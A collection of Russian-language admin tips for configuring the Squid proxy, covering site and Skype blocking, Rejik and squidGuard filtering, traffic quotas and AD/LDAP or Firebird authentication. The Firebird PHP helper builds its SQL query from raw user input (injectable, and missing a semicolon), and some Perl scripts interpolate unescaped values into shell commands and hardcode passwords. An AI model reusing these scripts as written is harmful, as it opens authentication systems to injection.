MySql) cat /usr/local/rejik/blocked_ipfw | awk '{ if ($1!="") {system("ipfw table 3 add "$1"")} }' > /dev/null - Добавляем в таблицу IP адреса к которым нужно закрыть доступ из ранее созданного файла cat /usr/local/rejik/blocked2_ipfw | awk '{ if ($1!="") {system("ipfw table 3 add "$1"")} }' > /dev/null - Добавляем в таблицу IP адреса к которым нужно закрыть доступ из ранее созданного файла echo "$DATE: IPFW to SAMS STARTED" >> /var/log/samslog - пишем в логе что всё удачно добавлено. ... Проверяем, создаём новых пользователей, добавляем их к какому-либо шаблону, добавляем в списки запретов IP адреса и запускаем скрипт, проверяем таблицы, читаем логи. В логах при запуске от sudo появляется запись. Если ничего не происходит смотрим на пути и имена файлов, скорее всего не тот файл указан.

Блокирование Skype соединений на прокси-сервере Squid (доп. ссылка 1) (доп. ссылка 2) (доп. ссылка 3) Автор: ttys [комментарии]

Для блокирование Skype в конфигурацию Squid можно внести следующие изменения: # ACL для выявления обращений с указанием IP-адресов в URL, например http:/1.2.3.4/ acl numeric_IPs url_regex ^(([0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)|(\[(0-9af]+)?:([0-9af:]+)?:([0-9af]+)?\])):443 # ACL для выявления обращений со словом skype в заголовке User Agent acl Skype_UA browser ^skype^ # Блокируем skype по двум вышеописанным признакам http_access deny numeric_IPS http_access deny Skype_UA

Настройка Squid в связке с Rejik Автор: kvasik [комментарии]

Введение: В статье хочу поделиться своим вариантом установки и конфигурирования прокси сервера SQUID в связке с Rejik для фильтрации баннеров. В заметке довольно наглядно описан конфигурационный файл SQUID, где можно гибко разграничить доступ по отдельным IP-адресам и на локальною подсеть. Рабочий пример, тест на FreeBSD 8.0-RELEASE i386: Установка и настройка прокси-сервера SQUID Ставим из пакетов: # pkg_add -r -K squid ключ -r загружает пакет с удаленного сервера. ключ -K сохраняет копию пакета в текущей директории. Конфигурируем: vi /usr/local/etc/squid/squid.conf #WELCOME TO SQUID 2.7.STABLE7 #---------------------------------------------------------------- #Имя листа доступа all, обозначающий все внутренние адреса: acl all src all #Имя листа доступа manager, отмечает протокол cache_object: acl manager proto cache_object #Имя листа доступа localhost, отмечает IP-клиента (127.0.0.1) acl localhost src 127.0.0.1/32 #Имя листа доступа to_localhost, отмечает подсеть ресурсов: acl to_localhost dst 127.0.0.0/8 0.0.0.0/32 #---------------------------------------------------------------- #Отмечаем подсети клиентов, которые могут обращаться к SQUID: acl localnet src 172.16.0.0/24 acl localnet src 172.16.1.0/24 #---------------------------------------------------------------- #Имена листов доступа, с указанием ресурсов: acl ip-block dst "/usr/local/etc/squid/block/ip-block" acl sites-block1 dstdomain "/usr/local/etc/squid/block/sites-block1" acl sites-block2 dstdomain .odnoklassniki.ru .vkontakte.ru #---------------------------------------------------------------- #Имена листов доступа, отмечающие порты и медот соединения: acl SSL_ports port 443 acl ports-std port 21 80 443 5190 9080 9443 acl CONNECT method CONNECT #---------------------------------------------------------------- #Правило разрешает обращаться к КЭШу локальному ХОСТу. http_access allow manager localhost #Правило запрещает обращаться к КЭШу всему остальному. http_access deny manager #---------------------------------------------------------------- #Правило запрещает все порты, кроме указ. в листе доступа "ports-std" http_access deny !ports-std #Правило запрещает соединения по методу "CONNECT" кроме порта 443: http_access deny CONNECT !SSL_ports #--------------------------------------------------------------- #INSERT YOUR OWN RULE(S) HERE TO ALLOW ACCESS FROM YOUR CLIENTS #--------------------------------------------------------------- #Здесь указываем листы доступа отдельных клиентов, которым требуется #гибко настроить уровень доступа: #--------------------------------------------------------------- acl user1 src 172.16.0.100 http_access allow user1 #--------------------------------------------------------------- acl user2 src 172.16.0.101 http_access deny user2 ip-block http_access deny user2 sites-block1 http_access allow user2 #--------------------------------------------------------------- #Здесь указываем запреты для остальных клиентов нашего прокси: http_access deny localnet ip-block http_access deny localnet sites-block1 http_access deny localnet sites-block2 http_access allow localnet http_access deny all #================================================================ #Блокируем доступ к КЭШу нашего сервера: icp_access deny all #---------------------------------------------------------------- #Откл. ICP-порт, если др. сервера не обращаются к КЭШу нашего сервера: icp_port 0 #Указываем порт нашего прокси: #Если фаерволом используется редирект на прокси, #необходимо добавить опцию "transparent": #http_port 3128 http_port 3128 transparent #--------------------------------------------------------------- #Параметр указывает, какая программа использыется для редиректа. Если #утилита не установлена в системе, то требуется закомментировать опцию. #url_rewrite_program /usr/local/rejik/redirector /usr/local/rejik/redirector.conf #--------------------------------------------------------------- #Default: #Язык страницы-блокировки, отображается при блокировании ресурсов. #error_directory /usr/local/etc/squid/errors/English error_directory /usr/local/etc/squid/errors/Russian-koi8-r #--------------------------------------------------------------- #TAG: cache_peer #Default: #none #Если у вас есть родительский кеш, укажите его здесь. Администраторы #родительского кеша обычно дают вам необходимые инструкции. Но вы всегда #должы спрашивать разрешения перед тем, как добавить родительский кеш. #--------------------------------------------------------------- #Default: #Кол-во памяти (ОЗУ) выделенной под кеширование. #Предупреждение: реально SQUID использует больше, чем указанное здесь #значение. Золотое правило: если вы имеете N мегабайт свободной памяти, #которую можете отдать под squid, укажите здесь значение N/3. #cache_mem 8 MB cache_mem 256 MB #--------------------------------------------------------------- #Первое число 100 -это количество дискового пространства, отведенного #под кеш (в мегабайтах). Второе и третье число -каталоги первого #и второго уровня соответственно. #Default: #cache_dir ufs /usr/local/squid/cache 100 16 256 cache_dir ufs /usr/local/squid/cache 2048 16 256 #-------------------------------------------------------------- #TAG: cache_mgr #Адрес эл. почты администратора прокси-сервера, который отображается #только на английской версии страницы, при блокировке ресурсов. #Default: #cache_mgr webmaster cache_mgr you@hostname.local #-------------------------------------------------------------- #Default: #Имя пользователя, от имени которого работает SQUID в системе: #cache_effective_user squid #-------------------------------------------------------------- #TAG: visible_hostname #В некоторых случаях, для работы демона SQUID, требуется указать имя #хоста, на котором он работает. #Default: #none visible_hostname you.hostname.local #-------------------------------------------------------------- #Default: #Имя файла, для записи идентификатора процесса: #pid_filename /usr/local/squid/logs/squid.pid #-------------------------------------------------------------- #Default: #Показывает, какие объекты выбрасываются из кэша, и какие объекты #сохраняются и на какой срок. Если нет утилиты для анализа этих данных, #можно смело отключать. #cache_log /usr/local/squid/logs/cache.log cache_log none #-------------------------------------------------------------- #Default: #Показывает, какие объекты выбрасываются из кэша, и какие объекты #сохраняются и на какой срок. Если нет утилиты для анализа этих данных, #можно смело отключать. #cache_store_log /usr/local/squid/logs/store.log cache_store_log none #-------------------------------------------------------------- #TAG: hierarchy_stoplist #Список строк - через пробел, - при встрече в URL которых, запрос будет #направлен сразу напрямую, а не "по соседям"; по-умолчанию -"cgi-bin ?": hierarchy_stoplist cgi-bin ? #-------------------------------------------------------------- #TAG: access_log #Файл журнала деятельности запросу клиента. С каждой линии HTTP или #ICP запросу. Если статистика не нужна, указать: access_log none access_log /usr/local/squid/logs/access.log squid #-------------------------------------------------------------- #TAG: refresh_pattern #Используется, чтоб определить не устарел ли объект в КЭШе: #usage: refresh_pattern [-i] regex min percent max [options] refresh_pattern ^ftp: 1440 20% 10080 refresh_pattern ^gopher: 1440 0% 1440 refresh_pattern -i (/cgi-bin/|\?) 0 0% 0 refresh_pattern . 0 20% 4320 #-------------------------------------------------------------- #TAG: upgrade_http0.9 #Лист доступа shoutcast, обозн. имя заголовка по заданному выражению: acl shoutcast rep_header X-HTTP09-First-Line ^ICY.[0-9] #Опция upgrade_http0.9, позволяющая отключить обновл. откликов HTTP/0.9: upgrade_http0.9 deny shoutcast #-------------------------------------------------------------- #TAG: broken_vary_encoding #Лист доступа "apache", обозн. имя заголовка по заданному выражению: acl apache rep_header Server ^Apache #Правило разрешает принимать битые заголовки от ACL apache: broken_vary_encoding allow apache #-------------------------------------------------------------- #TAG: coredump_dir #Директория, где хранится КЭШ SQUID: coredump_dir /usr/local/squid/cache Далее создаем директорию, в которой будут хранится файлы для блокирования ресурсов, используемые SQUID`ом: # mkdir /usr/local/etc/squid/block Создаем сами файлы: Список блокируемых ip-адресов: # cat > /usr/local/etc/squid/block/ip-block 169.254.0.1 169.254.0.2 169.254.0.3 ^C Список блокируемых доменов: # cat > /usr/local/etc/squid/block/sites-block1 afisha.ru mail.ru ^C Назначаем владельца, на директорию # chown -R squid /usr/local/etc/squid/block/ Далее делаем первый запуск SQUID: # squid -z 2010/06/07 15:58:46| Creating Swap Directories Параметр -z нужен для создания (обнуления) каталога, содержащего кэш. Параметр -z нужен только при первом запуске. После, будет создан файл squid.pid, которому необходимо задать владельца: # chown -R squid /usr/local/squid/logs/squid.pid После этого заработает рестарт SQUID: # /usr/local/etc/rc.d/squid [start/stop/restart] и реконфигурирование SQUID: # squid -k reconfigure Добавим строку в /etc/rc.conf для автозапуска squid: squid_enable="YES" Увидеть что SQUID корректно запустился, можно посмотрев: vi /var/log/messages Jun 7 16:30:19 hostname squid[1014]: Squid Parent: child process 1018 started Или внести изменения в настроки браузера :) Возможные ошибки: Если после запуска в логах "/usr/local/squid/logs/cache.log" видно: Could not determine fully qualified hostname.Please set 'visible_hostname В "/usr/local/etc/squid/squid.conf" нужно указать: visible_hostname you.hostname.local Если store.log быстро растет без видимых причин, исправляем пересозданием директории с кЭшем SQUID. Установка и настройка Rejik Ставим из пакетов: # pkg_add -r rejik Копируем банлисты в рабочий каталог Режика: В случае установки из портов: # cp -R /usr/ports/www/rejik/work/banlists /usr/local/rejik В случае установки из пакетов, с официального сайта http://www.rejik.ru/ Качаем файл "banlists-2.x.x.tgz" и "www.tgz", для Веб-страниц Распаковываем банлисты: # tar vxzf ./banlists-2.x.x.tgz Копируем в директорию, где установлен Rejik: # cp -R ./banlists /usr/local/rejik/ Распаковываем странички: # tar vxzf ./www.tgz Копируем в директорию, где лежат файлы Apache-сервера: # cp -R ./www /usr/local/www/data Даем права пользователю, от которого работает Apache # chown -R www:www /usr/local/www/data/www/ Даем права пользователю на директорию Rejik, от которого работает SQUID: # chown -R squid:squid /usr/local/rejik/ Чтобы избежать ошибок в /usr/local/squid/logs/cache.log Can't write to file /usr/local/rejik/redirector.err: Permission denied Конфигурируем: vi /usr/local/rejik/redirector.conf error_log /usr/local/rejik/redirector.err change_log /usr/local/rejik/redirector.log make-cache /usr/local/rejik/make-cache #allow_urls /usr/local/rejik/banlists/allow_urls <BANNER> ban_dir /usr/local/rejik/banlists/banners url http://127.0.0.1/www/1x1.gif #log off <PORNO> ban_dir /usr/local/rejik/banlists/porno url http://127.0.0.1/www/porno.html <MP3> ban_dir /usr/local/rejik/banlists/mp3 url http://127.0.0.1/www/mp3.html <JS> ban_dir /usr/local/rejik/banlists/js url http://127.0.0.1/www/js.js #log off Далее, в /usr/local/etc/squid/squid.conf включаем опцию редиректа, сняв комментарий со строки: #url_rewrite_program /usr/local/rejik/redirector /usr/local/rejik/redirector.conf url_rewrite_program /usr/local/rejik/redirector /usr/local/rejik/redirector.conf Вносим изменения в файлы режика в соответствии по желаниям блокировки: /usr/local/rejik/banlists/banners/urls /usr/local/rejik/banlists/porno/urls /usr/local/rejik/banlists/js/urls Например, чтобы заблокировать баннеры на сайте www.test.ru, достаточно добавить эти строчки: # cat > /usr/local/rejik/banlists/banners/urls ad.test.ru bannerhost.ru doubleclick.net pagead2.googlesyndication.com ^C После выполнения команды: # squid -k reconfigure будут приняты изменения конфигурации, в том числе и нашего редиректа. Используемая литература: /usr/local/etc/squid/squid.conf.default Отдельное спасибо: Моему коллеге Dok`у, за скрипт убирающий комментарии. Сайту lissyra.su, некоторые материалы взяты оттуда. Сайту opennet.ru, и отсюда :)

Генератор параметров для squidGuard Автор: globus [обсудить]

Небольшой скрипт, помогающий сгенерировать кусок файла конфигурации squidGuard на основе архива блэклистов с сайта urlblacklist.com: #!/usr/bin/perl #var my $db_dir="/var/db/squidGuard"; my @db_dir; my $c=0; my $i=0; my @dd; #main chdir "$db_dir"; opendir (DIR,".") or die "Не могу открыть директорию $!\n"; @db_dir= readdir(DIR); close (DIR); foreach my $d (@db_dir) { next if ($d eq "."); next if ($d eq ".."); if (-d $d) { kat($d); @dd[$i]="!$d"; $i++; } } print "@dd\n"; sub kat { my ($d)=@_; print "dest $d {\n"; if (-f "$d/urls") { print "\t urllist $d/urls\n"; } if (-f "$d/domains") { print "\t domainlist $d/domains\n"; } print "}\n"; } В директорию /var/db/squidGuard разворачиваем архив блеклистов (например, с сайта http://urlblacklist.com/?sec=download) при помощи скрипта генерируем готовые куски файла конфигурациии.

Squid + LightSquid + Perl = ограничение по трафику (доп. ссылка 1) Автор: Mosson [комментарии]

Очередное решение на наболевшую тему. Задача: имея squid с настроенной авторизацией пользователей и сбором статистики сделать ограничение на используемый трафик (квоты). Лично мне от sams пришлось отказаться т.к. он прикручивается к авторизации пользователей, а для меня это неприемлемо. Решение подойдет для тех, кому не сильно критично точное лимитирование. Я сильно не хотел менять устоявшуюся систему авторизации пользователей. итак. 1. настраиваем сквид (статей много, описывать не буду) В squid.conf , желательно перед остальными ACL, надо будет добавить следующее # блокировка юзеров которые превысили лимит (файл user-deny), # и разрешение этим пользователям только к тем IP и сайтам, которые перечислены в файле no_quota_url.txt acl no_quota url_regex -i “/etc/squid/no_quota_url.txt" acl banusers proxy_auth_regex -i “/etc/squid/user_deny.txt" http_access allow no_quota banusers allowedhost deny_info ERR_QUOTA all http_access deny banusers allowedhost all по порядку что к чему с файлами: no_quota_url.txt - ведется руками. текст: # файл содержит сайты, который открываются, даже если превышена квота и юзер попал в users_deny.txt очень_нужный_домен.ru icq.com 205.188. user_deny.txt - в дальнейшем создастся сам, но без него перечитать настройки squid не получиться # файл содержит пользователей превысивших квоту. # автоматически переписывается скриптом traf_limit.pl dolzhen_bit_odin_user user1 user2 ERR_QUOTA создадим по образу и подобию всех остальных страниц с ошибками. Я поставил что-бы получать другой текст. вот так получилось :) <HTML><HEAD><meta http-equiv="Content-Type" content="text/html; charset=koi8-r"> <TITLE>Превышен лимит</TITLE> </HEAD><BODY> <H1><font color="FF0000">ПРЕВЫШЕН ЛИМИТ</font></H1> <H2> </H2> <HR> <P>Заблокированный URL: <A HREF="%U">%U</A> <P> <UL> <LI> <STRONG>Вы превысили месячный лимит на интеренет.</STRONG> <P> </UL> <P>С Уважением отдел АСУ. allowedhost - мое правило проверки пользователей. 2. LightSquid абсолютно штатный. вот официальный сайт http://lightsquid.sourceforge.net/ ставится и настраивается минут 5-10. собственно вся настройка у меня заключалась в том, что-бы рассортировать юзеров по группам. Для тех у кого еще есть http сервер дополнительно будет красивая статистика. ;) 3. в /etc/squid создадим папку traf_limit 4. в /etc/squid/traf_limit создаем два файла traf_limit.pl #!/usr/bin/perl # # Довесок на LightSquid Project (c) 2004-2005 Sergey Erokhin aka ESL # # Скрипт создает файлик user_deny для ограничения сети по трафику # Автор: Иван Лонин loninia@apksouz.ru 2008 год. use File::Basename; # коряво конечно напрямую писать путь к конфигу, но лениво было sh файлик для крона делать :) require "/etc/squid/traf_limit/config"; #($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst)=localtime(time); @dat=localtime(time); $year =1900+$dat[5]; $month=1 + $dat[4]; if ($month<10){ $month="0".$month } $filter="$year$month"; #print "$log_path/$filter*\n"; @daylist=glob("$log_path/$filter*"); foreach $daypath (sort @daylist) { open FF,"<$daypath/.total"; $totaluser=<FF>;chomp $totaluser;$totaluser=~s/^user: //; $totalsize=<FF>;chomp $totalsize;$totalsize=~s/^size: //; while (<FF>) { ($user,$size,$hit)=split; $h{$user}{size}+=$size; $h{$user}{hit}+=$hit; } close FF; } # $cummulative=0; open RES,">$res_file"; print RES "# файл содержит юзеров превысивших квоту.\n# автоматически переписывается скриптом traf_limit.pl\ndolzhen_bit_odin_user\n"; foreach $user (sort {$h{$b}{size}<=>$h{$a}{size}} keys %h) { $all4user=$h{$user}{size}/1024/1024; if ($vip_user{$user}{size} > 0) { $limit=$vip_user{$user}{size}; }else{ $limit=$all_limit; } if ($all4user >= $limit) { print RES "$user\n"; # print "$h{$user}{size}\n"; }; } __END__ и файлик config #!/usr/bin/perl # конфигурационный файл для скрипта traf_limit.pl # # путь к логам lightsquid $log_path="/www/lightsquid/report"; # файл в который пушутся пользователи превысившие лимит $res_file="/etc/squid/user_deny.txt"; # лимит инета в мегабайтах $all_limit=150; # привилегированные пользователи с повышенным или пониженным лимитом # для каждого пользователя строка формата: #$vip_user{<имя_юзера>}{size}=<лимит_в_мегабайтах>; $vip_user{user1}{size}=5; $vip_user{qwe}{size}=50; назначим файликам нужного владельца и права на запуск 5. осталось в только в cron добавить запуск. Я сделал раз в сутки в 5-00. делать вечером в 20 с чем нибудь категорически не рекомендую т.к. скрипт работает на текущую дату (первого числа будут использоваться прошломесячные данные) делаем crontab -e и добавляем для скрипта строчку вида 45 04 * * * /etc/squid/traf_limit/traf_limit.pl и для сквида. 0 05 * * * /etc/init.d/squid reload Этот момент как выяснилось нужно объяснять. Дело в том, что Squid читает файлы конфигурации и все остальные кстати тоже, только при чтении конфигурации. Поэтому после отработки скрипта или изменении файла no_quota_url.txt обязательно надо перечитать конфиг (рестарт не желателен из-за сброса кэша). Команда как не трудно догадаться /etc/init.d/squid reload :) . собственно все :) . естественно, что правильно оно начнет работать только с 1 числа следующего за установкой месяца, если статистика до этого не собиралась. Удачи. Если есть вопросы пишите на loninia"сабака"apksouz.ru Пока статья на opennet лежала еще кусочек родился > А по ip адресу возможно тоже самое или только по юзерам работает > лимитирование? да, если у тебя нет авторизации, то статистика будет собираться по ip машин. только с привилегированными пользователями затык скорее всего будет… попробуй их назначать либо так $vip_user{"192.168.0.123"}{size}=5; либо так $user1="192.168.0.123"; $vip_user{$user1}{size}=5;

Авторизация пользователей по доменным группам AD в squid (доп. ссылка 1) Автор: Nichls [комментарии]

В squid.conf #Здесь описываем внешие ACL external_acl_type InetGroup-proxy-08-20ww %LOGIN /usr/local/squid/libexec/wbinfo_group.pl # accesse in internet in work week from 08-00 to 20-00 external_acl_type InetGroup-proxy-08-20aw %LOGIN /usr/local/squid/libexec/wbinfo_group.pl # accesse in internet in all week from 08-00 to 20-00 external_acl_type InetGroup-proxy-00-24all %LOGIN /usr/local/squid/libexec/wbinfo_group.pl # accesse in internet in all week from 00-00 to 24-00 # Проверь свои пути auth_param ntlm children 20 auth_param ntlm program /usr/local/samba/bin/ntlm_auth --helper-protocol=squid-2.5-ntlmssp auth_param ntlm max_challenge_reuses 0 auth_param ntlm max_challenge_lifetime 2 minutes auth_param basic children 20 auth_param basic program /usr/local/samba/bin/ntlm_auth --helper-protocol=squid-2.5-basic auth_param basic realm Squid proxy-caching web server auth_param basic credentialsttl 2 hours # Говорим, что нужна авторизация acl you_domain proxy_auth REQUIRED # Разграничиваем доступ по времени acl work-week time MTWHF 08:00-20:00 # Доступ с 08-00 до 20-00 с понедельника по пятницу acl all-week time SMTWHFA 08:00-20:00 # Доступ с 08-00 до 20-00 всю неделю acl all-time time SMTWHFA 00:00-24:00 # Доступ круглосуточно всю неделю # Осуществляем проверку на принадлежность к нужно группе acl InetAccess-proxy-08-20ww external InetGroup-proxy-08-20ww proxy-08-20ww acl InetAccess-proxy-08-20aw external InetGroup-proxy-08-20aw proxy-08-20aw acl InetAccess-proxy-00-24all external InetGroup-proxy-00-24all proxy-00-24all # Собираем все в кучу и проверяем на предмет получения дуступа к ИНТЕРНЕТ http_access allow you_domain work-week InetAccess-proxy-08-20ww http_access allow you_domain all-week InetAccess-proxy-08-20aw http_access allow you_domain all-time InetAccess-proxy-00-24all ---------------------- proxy-08-20ww, proxy-08-20aw, proxy-00-24all - Группы в домене. В них заносишь тех юзеров, которым разрешен доступ. wbinfo_group.pl - Используй именно этот скрипт. В том, что идет в комплекте со squid имеется ошибка. Здесь она исправлена. #!/usr/bin/perl -w # # external_acl helper to Squid to verify NT Domain group # membership using /usr/local/samba/bin/wbinfo # # This program is put in the public domain by Jerry Murdock # <jmurdock@itraktech.com>. It is distributed in the hope that it will # be useful, but WITHOUT ANY WARRANTY; without even the implied warranty # of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. # # Author: # Jerry Murdock <jmurdock@itraktech.com> # # Version history: # 2002-07-05 Jerry Murdock <jmurdock@itraktech.com> # Initial release # # external_acl uses shell style lines in it's protocol require 'shellwords.pl'; # Disable output buffering $|=1; sub debug { # Uncomment this to enable debugging print STDERR "@_\n"; } # # Check if a user belongs to a group # sub check { local($user, $group) = @_; $groupSID = `/usr/local/samba/bin/wbinfo -n "$group"`; # chop $groupSID; # because wbinfo -n also returns the group number $groupSID = substr($groupSID,0,index($groupSID," ",0)); $groupGID = `/usr/local/samba/bin/wbinfo -Y "$groupSID"`; chop $groupGID; # &debug( "User: -$user-\nGroup: -$group-\nSID: -$groupSID-\nGID: -$groupGID-"); return 'OK' if(`/usr/local/samba/bin/wbinfo -r \Q$user\E` =~ /^$groupGID$/m); return 'ERR'; } # # Main loop # while (<STDIN>) { chop; &debug ("Got $_ from squid"); ($user, $group) = &shellwords; $ans = &check($user, $group); &debug ("Sending $ans to squid"); print "$ans\n"; } ---------------------------------------------------------------------------------------------------------- smb.conf [global] workgroup = YOU-DOMAIN realm = YOU-DOMAIN.RU netbios name = demon server string = Proxy Server hosts allow = 10. 127. winbind separator = \\ # Обрати на это внимание winbind use default domain = yes winbind uid = 10000-20000 winbind gid = 10000-20000 winbind enum users = yes winbind enum groups = yes template homedir = /home/winnt/%D/%U template shell = /usr/local/bin/bash max log size = 50 security = domain password server = srv1 srv3 encrypt passwords = yes srv1 и srv3 - PRIMARY and BACKUP контроллеры домена ---------------------------------------------------------------------------------------------------------- root@demon#tail -f /usr/local/squid/var/logs/cache.log Got YOU-DOMAIN\\user1 proxy-08-20ww from squid Sending ERR to squid Got YOU-DOMAIN\\user1 proxy-08-20aw from squid Sending ERR to squid Got YOU-DOMAIN\\user1 proxy-00-24all from squid Sending OK to squid # Тут явно видно, что пользователя user1 нашли в группе proxy-00-24all и squid'у передано OK Got YOU-DOMAIN\\user2 proxy-08-20ww from squid Sending OK to squid Got YOU-DOMAIN\\user3 proxy-08-20ww from squid Sending OK to squid root@demon#tail -f /usr/local/squid/var/logs/access.log 1147851551.270 20 10.66.107.56 TCP_IMS_HIT/304 251 GET http://img.mail.ru/mail/ru/css/mail-main1.css YOU-DOMAIN\user1 NONE/- text/css Небольшое дополнение: Информация о членстве в группе хранится в кеше squida (по умолчанию) 1 час, а в кеше Winbinda - 300 сек. Чтобы не ждать столько времени при перемещении пользователя из одной группы в другую советую добавить в squid.conf при описании внешиx ACL опцию ttl,примерно так: external_acl_type InetGroup-proxy-08-20ww ttl=0 %LOGIN /usr/local/squid/libexec/wbinfo_group.pl а в smb.conf: [global] winbind cache time = 0

Авторизация в squid по группам AD Автор: boombax [комментарии]

Возникла необходимость разделять доступ пользователей сквид по группам AD. Утилита wbinfo_group.pl, идущая со сквидом при большом числе запросов валила сквид и были проблемы с кешированием данных. Возникла идея написать скрипт, который через rpc запрос забирал членов необходимых доменных групп и скидывал их в текстовые файлы на сервере, одновременно определяя изменения в них и при необходимости перегружая squid. #!/usr/bin/perl -w use Text::Diff; $login="testlogin"; $password="secret_password"; $domain="MYDOMAIN"; $dc="dc.domain.ru"; $path="/usr/local/etc/squid/acl"; $reload_squid_cmd="/usr/local/sbin/squid -k reconfigure"; @ADgroups = ("inet_users","inet_vip","inet_sluz","inet_block"); foreach $group (@ADgroups) { @group_check= sort `/usr/local/bin/net rpc group MEMBERS $group -U $login%$password -S $dc`; @group_check = grep {/^$domain\\/} @group_check; $col=@group_check; my $diff = diff \@group_check, "$path/$group.acl"; if ($diff and $col) { open (GROUPFILE, ">$path/$group.acl") or die "Can't create $group.acl: $!"; print GROUPFILE @group_check; $reconfigure++; } close GROUPFILE; } system("$reload_squid_cmd") if ($reconfigure); Данный скрипт вешается в cron и запускается раз в 5 минут Доработанная версия, изменения: -поддержка пользователей и групп из доверенных доменов -поддержка вложенных груп(т.е групп, содержащих в себе другие группы) -возможность указания более одного контроллера домена -отправка уведомлений по почте администратору о изменениях в группах #!/usr/bin/perl -w use Text::Diff; $login="mylogin"; $password="cool_password"; $samba_prefix="/usr/local"; $winbind_separator="\\"; @group_domain = ("DOMAIN1\\inet_users","DOMAIN1\\inet_vip","DOMAIN2\\inet_sluz"); %domain_dc = ( 'DOMAIN1' => [ 'dc.domain1.ru','bdc.domain1.ru' ], 'DOMAIN2' => [ 'ad1.domain2.ru','ad2.domain2.ru' ] ); $acl_path="/usr/local/etc/squid/acl"; $reload_squid_cmd="/usr/local/sbin/squid -k reconfigure"; sub IsGroup { my $item = shift; foreach $dc_group (@dc_groups) { return 1 if ($item =~ /^\Q$dc_group\E$/i); } # print "$item\n"; return 0; } sub extractusers { my $group = shift; my @group_sostav; (my $domain, $group) = split(/\Q$winbind_separator\E/, uc($group), 2); # print "$domain $group\n"; foreach $dc (@{ $domain_dc{$domain} }) { # print "$dc\n"; @group_sostav = `$samba_prefix/bin/net rpc group MEMBERS "$group" -U $login%$password -S $dc`; chomp(@group_sostav); @group_sostav = grep { /^\w+\\.+/i } @group_sostav; @group_sostav = grep { !/.+\$$/i } @group_sostav; # print "@group_sostav\n"; last if @group_sostav; } foreach my $login (@group_sostav) { $login =~ s/(\w+)\\(.+)/\L$1$winbind_separator$2\E/o; my $isgroup = IsGroup($login); extractusers($login) if $isgroup; push (@users,"$login\n") if !$isgroup; } } @dc_groups = `$samba_prefix/bin/wbinfo -g`; chomp(@dc_groups); foreach $group (@group_domain) { local @users; extractusers($group); my %Users = (); my @unique = sort {uc($a) cmp uc($b)} grep{!$Users{$_}++}@users; my $count = @unique; my $diff = diff "$acl_path/$group.acl", \@unique; if ($diff and $count) { print "Internet acl group <$group> change:\n"; print "$diff\n" if $diff;; open (GROUPFILE, ">$acl_path/$group.acl") or die "Can't create $group.acl: $!"; print GROUPFILE @unique; close GROUPFILE; $reconfigure++; } } system("$reload_squid_cmd") if ($reconfigure);

Авторизация в squid через базу данных FireBird Автор: Constantine A.Yarovoy [обсудить]

в squid.conf добавляем: auth_param basic program /usr/sbin/firebird_auth auth_param basic children 5 auth_param basic realm Proxy auth_param basic credentialsttl 2 hours acl your_net src 10.1.0.0/24 acl passwd proxy_auth REQUIRED http_access allow your_net passwd http_access deny all /usr/sbin/firebird_auth - наш скрипт для проверки #!/usr/local/bin/php <? while(1) { $buf = fgets(STDIN); $buf = substr($buf,0,-1); $account_data = explode(" ",$buf); $link = ibase_connect("10.1.0.200:/var/db/firebird/storage/squid.fdb","SYSDBA","<your_pass>"); $res = ibase_query("SELECT * FROM users WHERE LOGIN = '". $account_data[0]."' AND PASSWD = '".$account_data[1]."'") $row = ibase_fetch_object($res); if(isset($row->LOGIN)) { echo "OK\n"; } else { echo "ERR\n"; } ibase_free_result($res); ibase_close($link); } ?> ну и не забудьте сделать табличку users в вашей базе в firebird такого содержания: ID,LOGIN,PASSWD,FIO..

Ограничение доступа по ip назначения в Squid Автор: Skif (Чижиков Владимир) [комментарии]

Типичная задача: Разрешить доступ пользователю к списку сетей (например UA-IX) и запретить мир, и наоборот, запретить доступ пользователя к списку сетей и разрешить все остальное acl UAIXLIST dst "/usr/local/etc/squid/access_list/ua-ix.cfg" #Список сетей acl host_alfa src 10.0.38.1 # первый хост acl host_luna src 10.0.38.2 # второй хост http_access allow host_alfa UAIXLIST # Разрешаем доступ к UAIXLIST http_access deny host_alfa all # Запрещаем ко всему остальному http_access deny host_luna UAIXLIST # Запрещаем доступ к UAIXLIST http_access allow host_luna all # разрешаем ко всему остальному В последних двух правилах возможна альтернатива: http_access allow host_luna !UAIXLIST содержимое /usr/local/etc/squid/access_list/ua-ix.cfg 62.16.0.0/19 62.64.64.0/18 62.80.160.0/19 62.149.0.0/19 62.221.32.0/24 62.221.33.0/24 62.221.34.0/24 62.221.37.0/24 ...... Знаки комментариев # нежелательны, возможны ошибки(по крайней мере в squid-2.5.x). Повторы сетей из разряда 62.64.64.0/18 62.64.64.0/24 вызовут предупреждения о дублировании адресов сетей

Фильтрация mime_type на Squid'e Автор: Дмитрий Загацкий [обсудить]

Использовался сервер FreeBSD 4.11-p13 squid/2.5.STABLE9 также тестировалось на squid/2.5.STABLE12 acl stream rep_mime_type -i ^application/x-mms-framed$ http_reply_access deny stream http_reply_access allow all

SQUID в сети SAMBA + LDAP, использование групповых ACL Автор: Афлетдинов Андрей [комментарии]

Имеем: 1. Учетные записи пользователей и групп в LDAP 2. Поднят домен на SAMBA-3. На стороне сервера SQUID конфигурируем: 1. /etc/ldap.conf и /etc/nsswith.conf в результате getent passwd и getent group выдает список пользователей и групп 2. минимальный /etc/smb.conf: [global] workgroup = domain netbios name = squid load printers = no printcap name = /dev/null security = domain password server = sambaserver local master = no os level = 33 domain master = no preferred master = no wins support = no winbind use default domain = yes winbind cache time = 1200 3. Заводим в домен net -Uadministrator join 4. Запускаем winbind, но при этом в /etc/nsswith.conf его _не_прописываем_ 5. разрешаем чтение pipe winbindd процессу squid любым доступным способом, например: setfacl -g:squid:rx /var/lib/samba/winbindd_privileged 6. samba в дальнейшем не нужна 7. далее в squid.conf: # стандартные опции авторизации auth_param ntlm program /usr/bin/ntlm_auth --helper-protocol=squid-2.5-ntlmssp auth_param ntlm children 5 auth_param ntlm max_challenge_reuses 0 auth_param ntlm max_challenge_lifetime 2 minutes auth_param ntlm use_ntlm_negotiate off auth_param basic program /usr/bin/ntlm_auth --helper-protocol=squid-2.5-basic auth_param basic children 5 auth_param basic realm Squid proxy-caching web server auth_param basic credentialsttl 2 hours auth_param basic casesensitive off # авторизация обязательна acl NTLMauth proxy_auth REQUIRED # определяем типы ACL external_acl_type type_ldap_group1 ttl=60 children=1 %LOGIN /usr/lib/squid/ squid_ldap_group.pl -b "cn=group1,ou=group,dc=ldap,dc=local" -H ldaps://ldap.local external_acl_type type_ldap_group2 ttl=60 children=1 %LOGIN 